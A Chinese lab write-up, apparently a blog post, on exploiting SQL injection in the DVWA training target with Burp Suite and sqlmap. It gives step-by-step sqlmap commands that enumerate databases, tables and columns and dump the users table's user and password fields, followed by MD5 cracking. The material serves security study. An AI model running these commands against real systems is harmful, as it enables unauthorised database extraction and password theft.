2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法,使用SQLMAP、任意抓包工具)
首先進入DVWA,調整安全級別為low。
開啟SQL Injection頁面,ID欄輸入1
因為DVWA需要登入,所以使用Burp Suite抓包,包裡包含了cookie。
將抓包內容儲存至本地(/root/test)
開啟終端,輸入: sqlmap -r /root/test --current-db ,根據包裡的內容猜解當前資料庫,可以不加--current-db以爆破所有庫。
得到當前使用庫名'dvwa',輸入:sqlmap -r /root/test -D dvwa --tables ,爆破dvwa庫中的表名。
查看錶名,比較感興趣的是users表,所以輸入:sqlmap -r /root/test -D dvwa -T users --columns ,爆破users表中的列。
出現user和password欄位,輸入:sqlmap -r /root/test -D dvwa -T users -C user,password --dump ,檢視並順手md5猜解一下。
相關推薦
2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法,使用SQLMAP、任意抓包工具)
首先進入DVWA,調整安全級別為low。 開啟SQL Injection頁面,ID欄輸入1 因為DVWA需要登入,所以使用Burp Suite抓包,包裡包含了cookie。 將抓包內容儲存至本地(/root/test) 開啟終端,輸入: sqlmap
2018硬體第一次培訓總結
2018屆科協硬體第一次培訓總結 第一次的科協硬體培訓,主要為大家講解了對基本電路元器件和電路的認識,以及AD18的使用操作,使用DXP繪製原理圖並生成PCB,下面對培訓的內容進行詳細介紹: 1.DXP &
WebQQ 2018(一)第一次登入
檢查登入狀態 GET: 返回: {"retcode":0} 表示已登入 {"retcode":100101} 登入狀態過期 獲取登入二維碼 GET: Cookies:{'pt_clientip': 'b0867167015c4d89', 'pt
物聯網工程學院2018年第一次軟體培訓----培訓總結
第一次培訓的內容是C語言基礎,按照“C語言引述”——“C語言基礎知識及語法講解” ——“國慶大禮包講解”的順序展開。同時本次培訓“安裝IDE & 配置環境(CodeBlocks)”的工作已經於培訓前全部完成。下面按照培訓順序進行總結和擴充。 目錄
2018年第一次嵌入式底層面試記錄
面試某公司嵌入式底層,由於還在上班,所以是電話面試。原本以為會考很難的題目,但是問的都很基礎。有些自己明明懂的也蒙圈了,所以有必要做個記錄。 1、自我介紹。 答:------------------- 2、請問u
2018.10.26 洛谷P4551 最長異或路徑(01trie)
傳送門 直接把每個點到根節點的異或距離插入01trie。 然後列舉每個點在01trie上匹配來更新答案就行了。 程式碼: #include<iostream> #include<cstdio> #include<cstring> #include&
CNVD-2018-20024——MetInfo 6.1.2 SQL注入漏洞
0x00漏洞簡介 metinfo是一個cms 6.1.2版本中存在一個sql盲注漏洞 0x01漏洞細節與漏洞利用 在\app\system\message\web\message.class.php的add函式。 get_one這裡有個columnid 這個地方是傳入int型別
2018.10.11【BZOJ1143】【CTSC2008】祭祀river(最長反鏈)
傳送門 解析: 有DilworthDilworthDilworth定理: 最長反鏈長度===最小鏈覆蓋數。 證明我覺得VfleakingVfleakingVfleaking的部落格寫得很好%%%%%%
2018.10.24【校內模擬】小 C 的序列(數論)(連結串列)
傳送門 解析: 本來可以拿80pts80pts80pts暴力的 然後unorderedmap−>mapunordered\text{ }map->mapunorderedmap−>map,−20pts-20pts−20pts
2018.10.25【NOIP練習】ZUA球困難綜合徵(線段樹)(CRT)
傳送門 解析: 首先,這天坑的出題人。。。 思路肯定是線段樹維護區間運算結果,但是兩萬多的模數怎麼維護? 這奇怪的光速。。。光速不是299792458m/s299792458m/s299792458m/s嗎?怎麼會變成293932939329393? 是的模數
第一次使用樹莓派會用到的操作(修改國內源,中文輸入法,鍵盤佈局,時區,掛載行動硬碟等)
1.將樹莓派官方源修改為國內快速源 修改配置檔案 [email protected] ~ $ vi /etc/apt/sources.list eb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ wheezy
2018.10.25【NOIP練習】最大瘋子樹(樹形DP)
傳送門 解析: 其實簡單推一下我們發現一個瘋子樹內部任何一條路徑上點權都是單峰下凸的。 證明也很簡單,不過請記住一點,考場上沒有必要去想證明,除非你時間真的很充裕。 必要性:如果不是單峰下凸,則不是瘋子樹。 考察如果尋在一條不是單峰下凸的路徑,那麼這個路徑的某
第一次使用linux並編寫了一個dump mysql的程式,記錄下簡單的步驟
機器安裝linux redhat5.0 64位。客戶管理員給了我賬戶密碼,我用SecureCRT登入。 連線後: ls 列表檔案,當然支援萬用字元 cd path 進入某個目錄 *SecureCRT中可以像window一樣複製路徑,比較方便。 cd .. 返回上層 c
DVWA平臺的sql注入學習
要用UNION語句,必須先知道後臺的查詢語句的查詢結果是多少列的,所以利用order by語句測試,此處就是將輸入“‘ or '1' = '1' order by 1 -- ”的order by 1部分改成2,3……當按照第二列排序時,不報錯,當按第三列排序時,報錯,因此可得到查詢結果是2列的。所以我們用UN
cocos2d-x3.0/2.0 win7第一次建立專案需要呼叫到的指令碼(不斷更新維護)//cocos2d-x 教程一
第一步: github上最新的引擎,值得注意的是官網上釋出的引擎是穩定版。選擇哪種就看個人喜好了。但是最新功能你都體驗不到。建議下載git工具然後clone到本地來更新 第二步: 下載後 用cmd終端裡面進入cocos2d-x\tools\project-creator
使用ajax提交,第一次進入error:{"readyState":0,"responseText":"","status":0,"statusText":"error"},第二次才能通過
錯誤現象:後臺執行無誤,但是ajax第一次總是進入error,第二次又可以正常執行。 錯誤程式碼:{"readyState":0,"responseText":"","status":0,"statusText":"error"}。 錯誤分析:網上搜索說是由於form表單提
DVWA學習之SQL注入
DVWA學習之SQL注入 環境工具 dvwa 1.9 phpstudy firefox burpsuite 實驗步驟 一、設定安全級別為LOW 1. 登入DVWA,並將安全級別設定為LOW 2. 進入SQL注入模組,並輸入1,返回結果如下 3. 下面判斷注入型別是字元型注入還是整數型注入 字元型注入的SQ
10年前,我就用 SQL注入漏洞黑了學校網站
> 我是風箏,公眾號「古時的風箏」,一個兼具深度與廣度的程式設計師鼓勵師,一個本打算寫詩卻寫起了程式碼的田園碼農! 文章會收錄在 [JavaNewBee](https://github.com/huzhicheng/JavaNewBee) 中,更有 Java 後端知識圖譜,從小白到大牛要走的路都在裡面。 標
十五周二次課、三次課(4月3日、4月4日)
linux十五周二次課、三次課(4月3日、4月4日)不停庫不鎖表在線主從配置 http://blog.sina.com.cn/s/blog_6f2108260101kwxv.htmlmysql主從常見問題1、從庫的mysql命令行下執行:show slave status \G,查看三個狀態:
背水一戰 Windows 10 (119) - 後臺任務: 後臺下載任務(任務分組,組完成後觸發後臺任務)
mode present llb ner tina when http 對象 pat [源碼下載] 背水一戰 Windows 10 (119) - 後臺任務: 後臺下載任務(任務分組,組完成後觸發後臺任務) 作者:webabcd介紹背水一戰 Windows 10 之 後